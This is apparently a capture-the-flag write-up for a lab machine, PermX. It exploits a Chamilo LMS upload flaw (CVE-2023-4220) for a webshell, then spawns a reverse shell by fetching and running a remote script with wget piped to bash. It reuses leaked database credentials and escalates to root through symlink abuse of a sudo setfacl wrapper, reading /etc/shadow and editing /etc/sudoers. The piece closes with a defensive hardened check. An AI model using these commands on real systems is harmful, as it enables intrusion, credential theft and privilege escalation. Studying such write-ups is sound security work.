Recon
└──╼ $ nmap -p- -A permx.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 13:28 UTC
Nmap scan report for permx.htb (10.129.179.162)
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can browse the whole site, but nothing interesting seems to be on it.
└──╼ $ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://FUZZ.permx.htb -H "Host: FUZZ.permx.htb" -fc 302 -t 200
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://FUZZ.permx.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
:: Header : Host: FUZZ.permx.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 302
________________________________________________
www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 45ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 7517ms]
The www subdomain doesn't seem to work, but it tells us something about our next subdomain, and the second one, lms, seems to be our way in.
CVE-2023-4220
Checking as usual for exploits, we find https://github.com/Rai2en/CVE-2023-4220-Chamilo-LMS.
It seems new, so maybe it is not patched. Running the test script we get:
Running the exploit gives us a webshell.
We can modify the contents of the cmd variable so that it spawns a reverse shell. In Burp we send the request to Repeater, change the cmd variable to wget -O - 10.10.14.81/shell.sh | bash, URL-encode it, send it, and we are in.
http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=wget -O - 10.10.14.81%2Fshell.sh | bash
For quality of life, we can stabilise the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg
User access
From the linpeas scan we can see that there is an SFTP service we can connect to locally, and we know a username and password for it. That may be useful for privilege escalation, but for now it doesn't seem to work.
╔══════════╣ Analyzing Env Files (limit 70)
-rwxr-xr-x 1 www-data www-data 326 Nov 3 2022 /var/www/chamilo/vendor/knplabs/gaufrette/.env.dist
...
FTP_HOST=ftp
FTP_PORT=21
FTP_USER=gaufrette
FTP_PASSWORD=gaufrette
FTP_BASE_DIR=/gaufrette
MONGO_URI=mongodb://mongodb:27017
MONGO_DBNAME=gridfs_test
SFTP_HOST=sftp
SFTP_PORT=22
SFTP_USER=gaufrette
SFTP_PASSWORD=gaufrette
SFTP_BASE_DIR=gaufrette
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Next I searched through all the likely config files, as usual, and found something more interesting:
/var/www/chamilo/app/config/configuration.php
...
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
...
The password works for the mtz user as well, so there is no need to log in to the database.
Priv esc
Running LinEnum again gives us interesting information:
mtz@permx:/opt$ sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
And the content of /opt/acl.sh is:
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
It lets us run setfacl as root on files whose path starts with /home/mtz/.
My first thought was to abuse the installed setfacl version.
mtz@permx:/opt$ /usr/bin/setfacl --version
setfacl 2.3.1
There are some CVEs, but none that I managed to use.
Then I focused on understanding the script's restrictions and decided to bypass the location check using symlinks.
ln -s /etc/shadow shadow
sudo /opt/acl.sh mtz rwx /home/mtz/shadow
It works and lets us read the shadow file.
mtz@permx:~$ cat shadow
...
root:$y$j9T$VEMcaSLaOOvSE3mYgRXRv/$tNXYdTRyCAkwoSHhlyIoCS91clvPEp/hh0r4NTBlmS7:19742:0:99999:7:::
mtz:$y$j9T$RUjBgvOODKC9hyu5u7zCt0$Vf7nqZ4umh3s1N69EeoQ4N5zoid6c2SlGb1LvBFRxSB:19742:0:99999:7:::
...
I could not crack the hashes, so I tried a different approach.
mtz@permx:~$ ln -s /etc/sudoers /home/mtz/sudoers
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/sudoers
mtz@permx:~$ echo "mtz ALL=(ALL:ALL) NOPASSWD: ALL" >> sudoers
mtz@permx:~$ sudo su
And we got the root flag.
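The root cause of the symlink bypass is that acl.sh validates the literal string in $target and then uses [ -f ], which follows symlinks, so /home/mtz/sudoers -> /etc/sudoers satisfies both tests. The script below is an added example of a hardened target check, not the box's own /opt/acl.sh: it canonicalises the path with realpath before comparing it to the allowed directory and refuses symlinks outright. The function and the demo helper (check_target, demo_symlink_bypass) are hypothetical names, the allowed directory is a parameter so the check can be exercised against a scratch directory, and the files and hash in the demo are constructed.

```shell
#!/bin/bash
# Added example (not the PermX box's own /opt/acl.sh): a hardened target check
# for a setfacl wrapper. The original script tests the *string* "$target"
# against /home/mtz/* and then uses [ -f ], which follows symlinks, so a link
# /home/mtz/sudoers -> /etc/sudoers passes both tests. This version resolves
# the real path first and refuses symlinks entirely.
# Assumption: the allowed directory is passed in, rather than hard-coded.

# check_target ALLOWED_DIR TARGET
# Exit status 0 only if TARGET is a regular, non-symlink file whose canonical
# path lies strictly inside the canonical form of ALLOWED_DIR.
check_target() {
    local allowed="$1" target="$2" real_allowed real_target

    # Refuse a symlink as the final component. Symlinked directories higher
    # up in the path are caught by the canonical-path comparison below.
    if [ -L "$target" ]; then
        return 1
    fi

    # realpath -e resolves every component and fails if the path is missing.
    real_allowed=$(realpath -e -- "$allowed") || return 1
    real_target=$(realpath -e -- "$target") || return 1

    # Regular file only (no directory, device or socket).
    [ -f "$real_target" ] || return 1

    # Prefix check with a trailing slash so /home/mtz2/x cannot match /home/mtz.
    case "$real_target" in
        "$real_allowed"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# demo_symlink_bypass: constructed scratch layout mirroring the writeup
# (a fake home dir holding a legitimate note plus symlinks to a fake /etc).
# Returns 0 when the real file is accepted and every escape attempt is refused.
demo_symlink_bypass() {
    local tmp home ok=0
    tmp=$(mktemp -d) || return 1
    home="$tmp/home/mtz"
    mkdir -p "$home" "$tmp/etc"
    echo "root:CONSTRUCTED-HASH:19742:0:99999:7:::" > "$tmp/etc/shadow"
    echo "notes" > "$home/notes.txt"
    ln -s "$tmp/etc/shadow" "$home/shadow"   # file symlink, as in the writeup
    ln -s "$tmp/etc" "$home/etclink"         # directory-symlink variant

    check_target "$home" "$home/notes.txt"        || ok=1  # must be accepted
    check_target "$home" "$home/shadow"           && ok=1  # symlink to file
    check_target "$home" "$home/etclink/shadow"   && ok=1  # through dir symlink
    check_target "$home" "$home/../../etc/shadow" && ok=1  # traversal
    check_target "$home" "$tmp/etc/shadow"        && ok=1  # outside the prefix
    check_target "$home" "$home"                  && ok=1  # a directory

    rm -rf "$tmp"
    return "$ok"
}

demo_symlink_bypass && echo "hardened check: real file accepted, escapes refused"
```

Even with this check, the invoking user owns /home/mtz and can swap the regular file for a symlink between the check and the setfacl call, so canonicalising only narrows the window. The robust fix is to not hand root's setfacl to a path the caller controls at all: restrict the sudo rule to files owned by that user, or drop the NOPASSWD entry.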